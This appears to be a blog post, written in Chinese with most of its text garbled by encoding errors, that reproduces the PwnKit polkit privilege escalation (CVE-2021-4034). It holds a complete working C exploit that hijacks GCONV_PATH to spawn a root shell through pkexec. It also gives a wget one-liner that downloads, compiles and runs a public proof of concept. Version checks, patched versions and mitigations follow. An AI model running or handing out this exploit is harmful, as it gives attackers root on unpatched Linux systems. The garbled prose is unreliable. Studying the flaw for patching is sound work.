Polkit Local Elevation of Privilege Vulnerability (CVE-2021-4034) is reproduced

æ¬æä ̧»è¦å¤ç°2022å¹ ́1æåºç°çPolkitçRCEæ1/4æ ́

1.æ1/4æ ́å1/2±åèå ́

ç"大å¤æ°çæ¬linuxé1/2å ̈æ¬æ¬¡å1/2±åèå ́ä ̧

漏洞检测方法：
centos：rpm -qa |grep 'polkit'
ubuntu：dpkg -l policykit-1           

2.æ1/4æ ́å1/2±ååæ¡ä"¶

• ææ件çæ§è¡æé
• ægccç1/4è ̄ï1/4æå¥1/2ï1/4没æä¹å ̄以ç ̧åçæ¬ä ̧èªè¡ç1/4ème ̄ï1/4

3. æ1/4æ ́å¤ç°

3.1POC

/*
 * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis <[email protected]>
 * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shell = 
	"#include <stdio.h>\n"
	"#include <stdlib.h>\n"
	"#include <unistd.h>\n\n"
	"void gconv() {}\n"
	"void gconv_init() {\n"
	"	setuid(0); setgid(0);\n"
	"	seteuid(0); setegid(0);\n"
	"	system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
	"	exit(0);\n"
	"}";

int main(int argc, char *argv[]) {
	FILE *fp;
	system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
	system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
	fp = fopen("pwnkit/pwnkit.c", "w");
	fprintf(fp, "%s", shell);
	fclose(fp);
	system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
	execve("/usr/bin/pkexec", (char*[]){NULL}, env);           

ä1/2¿ç ̈æ¹æ³ï1/4gccç1/4è ̄+æ§è¡å³å ̄

3.2å¿«æ·çæ1/4æ ́å©ç ̈

ç ́æ¥æ§è¡

wget https://ghproxy.com/https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c && gcc cve-2021-4034-poc.c -o cve-2021-4034-poc && ./cve-2021-4034-poc           

3.3æ1/4æ ́ç»æ

è¿è¡ä ̧è¿°å1/2ä"¤å¦æ1/4æ ́æªä¿å¤ä3/4¿®å ̄ç ́æ¥è·årootæéã

4.æ1/4æ ́ä¿®å¤

4.1ä¿å ®¤çæ¬

centos：

• CentOS 6ï1/4polkit-0.96-11.el6_10.2
• CentOS7：polkit-0.112-26.el7_9.1
• CentOS 8.0ï1/4polkit-0.115-13.el8_5.1
• CentOS 8.2ï1/4polkit-0.115-11.el8_2.2
• CentOS 8.4ï1/4polkit-0.115-11.el8_4.2

ubuntu：

• Ubuntu 20.04 LTS：policykit-1 - 0.105-26ubuntu1.2
• Ubuntu 18.04 LTS：policykit-1 - 0.105-20ubuntu0.18.04.6
• Ubuntu 16.04 ESM：policykit-1 - 0.105-14.1ubuntu0.5+esm1
• Ubuntu 14.04 ESM：policykit-1 - 0.105-4ubuntu3.14.04.6+esm1

4.2 ä¿®å¤æ¹æ¡

4.2.1 åæ°éå®

æ³ ̈ï1/4æ ̈èè ̄¥æ¹æ¡ï1/4è¿ç§æ¹æ¡ä ̧å ̄¹ä ̧å¡çå ä¹æ²¡æå1/2±å

1、修改pkexec的权限：chmod 0755 /usr/bin/pkexec 
2、如果pkexec非必要，可临时删除该可执行程序            

4.2.2 çæ¬å级

æ³ ̈æ ï1/4

• å级ä1/4å ̄1/4è ́dockerãk8sä¹ç±"çå¹å ̈æå¡æ æ³è¿é ï1/4éè¦å ̈æ ́æ°åè¿è¡éå ̄ãå¦æä ̧å¡ä ̧è1/2éå ̄ï1/4å"ºè®®®éæ åæ°éå®®ç橹å1/4ä¿å ®¤®
• å级å åéç¡®ä¿polkitå级å°äºå å ̈çæ¬ï1/4æäºyumæºçççæ¬æªæ ́æ°å°å®®®̈çæ¬

centos：yum -y install polkit
ubuntu：apt-get install policykit-1